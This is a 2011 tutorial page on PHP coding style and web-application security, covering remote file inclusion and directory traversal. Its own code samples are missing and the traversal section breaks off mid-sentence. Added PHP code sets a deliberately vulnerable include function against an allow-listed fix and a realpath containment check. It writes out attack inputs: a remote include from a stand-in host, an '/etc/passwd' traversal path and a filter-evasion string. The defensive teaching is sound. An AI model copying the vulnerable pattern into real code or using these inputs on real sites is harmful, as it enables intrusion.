Web Application Security
By: Darkvengance Date: November 25, 2011
Even the most basic application security, whether the application is web, desktop, server or cloud based, starts with good coding practices. The definition of "good" coding practices varies from programmer to programmer; however, they all revolve around two primary concepts: efficiency and "looks". The main goal here is to learn the very basics. Since everyone has their own way of doing things, you should find what works best for YOU and stick with it.

First we'll start with looks. You may be thinking to yourself "who cares how my code looks?" Well, you should! If your code looks good and is well commented, then you, as well as anyone you ask for assistance, will be able to scan through the code and quickly pinpoint any errors in it. Let's look at an example. Quickly review both of the code samples below and identify the error (you should not spend more than 10 seconds on each).
Did you notice the error? Both examples were the exact same code and contained the exact same error (a missing period, PHP's string concatenation operator, after the $key variable in the foreach loop); however, as you may have noticed, example two was a lot easier to read, which made the error that much easier to spot. The most common technique is to indent blocks of code that sit inside other blocks; this is especially important with anything that uses curly brackets (functions, if statements, while loops, etc.). Indenting is the one thing that nearly all programmers, regardless of language, agree on, and some languages (such as Python) even require it. As stated earlier, all programmers have their own way of doing things; however, the most common convention is simply one indent per level, with the exception of level one. A "level" here means every block of code that is within another block. For simplicity's sake, the opening and closing PHP tags denote the start and end of level one; every opening curly bracket begins a new level and every closing curly bracket ends one. Take the following code for example:
The above script eliminates the risk of RFI (remote file inclusion) by limiting the input to one of two colors, although it is still unwise to pass user input to functions such as include or require at all.

Directory Traversal
Directory traversal was one of the first web site attacks and still remains fairly popular among hackers today. Directory traversal is an attack which involves "working backwards" through...
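Neither the two-color script nor a traversal payload survives on this copy of the page, so the following is an added example (my code, not the article's) that serves both passages above: an include target taken straight from the request, which is exposed to remote file inclusion and to directory traversal; the allow-list fix the article describes for the RFI case; and a realpath-based containment check for the case where a real file name must be accepted. The parameter names, the themes/ and docs/ directories and the file names are assumptions made for illustration.

```php
<?php
// Added example, not the article's own script. It shows an include target
// taken straight from the request (vulnerable to remote file inclusion and
// to directory traversal), the allow-list fix the article describes, and a
// containment check for the case where a real file name must be accepted.
// The parameter names, the themes/ and docs/ directories and the file names
// are assumptions made for illustration.

// VULNERABLE: the request value becomes part of the include path unchanged.
// With allow_url_include=On, color=http://evil.example/shell.txt pulls in
// remote code (RFI); even without it, color=../../../../etc/passwd walks out
// of themes/ (the appended .php only narrows which files can be reached).
function theme_path_vulnerable(string $color): string
{
    return __DIR__ . '/themes/' . $color . '.php';
}

// HARDENED (the article's approach): the request value is only a KEY into a
// fixed map. Unknown keys, and non-string values such as color[]=x, fall back
// to the default, so attacker-controlled text never reaches the path at all.
function theme_path_allowlisted($color): string
{
    $themes = ['red' => 'red.php', 'blue' => 'blue.php'];
    if (!is_string($color) || !isset($themes[$color])) {
        $color = 'red';
    }
    return __DIR__ . '/themes/' . $themes[$color];
}

// When an allow-list is impossible (the user picks from many files),
// canonicalise and check containment instead of trying to strip "../".
function contained_path(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($name, "\0") !== false) {
        return null;                                   // bad base or NUL byte
    }
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($resolved === false) {
        return null;                                   // does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    // realpath() has already collapsed "..", "." and symlinks, so a plain
    // prefix comparison decides whether the result stayed inside $base.
    return strncmp($resolved, $prefix, strlen($prefix)) === 0 ? $resolved : null;
}

// --- demo with constructed input and a throw-away directory tree ---------
$attempts = ['red', 'blue', '../../../../etc/passwd', 'http://evil.example/shell.txt'];
foreach ($attempts as $color) {
    printf("color=%-32s vulnerable: %s\n", $color, theme_path_vulnerable($color));
    printf("%-38s allow-list: %s\n", '', theme_path_allowlisted($color));
}

$tmp = sys_get_temp_dir() . '/traversal_demo_' . getmypid();
mkdir($tmp . '/docs', 0700, true);
file_put_contents($tmp . '/docs/readme.txt', "public document\n");
file_put_contents($tmp . '/secret.txt', "lives above docs/\n");

// 'readme.txt' is accepted; '../secret.txt' resolves outside docs/ and is
// rejected; '....//secret.txt' (an evasion against naive "../" stripping)
// and 'missing.txt' do not exist, so realpath() fails and they are rejected.
$names = ['readme.txt', '../secret.txt', '....//secret.txt', 'missing.txt'];
foreach ($names as $name) {
    $ok = contained_path($tmp . '/docs', $name);
    printf("name=%-18s -> %s\n", $name, $ok === null ? 'REJECTED' : 'OK ' . $ok);
}

// tidy up
unlink($tmp . '/docs/readme.txt');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/docs');
rmdir($tmp);
```

Two caveats on the containment check: realpath() returns false for a file that does not exist yet, so this form only suits reads of existing files (for a write, resolve the parent directory and check that instead); and because it follows symlinks, a link inside docs/ that points elsewhere is rejected too, which is usually what you want.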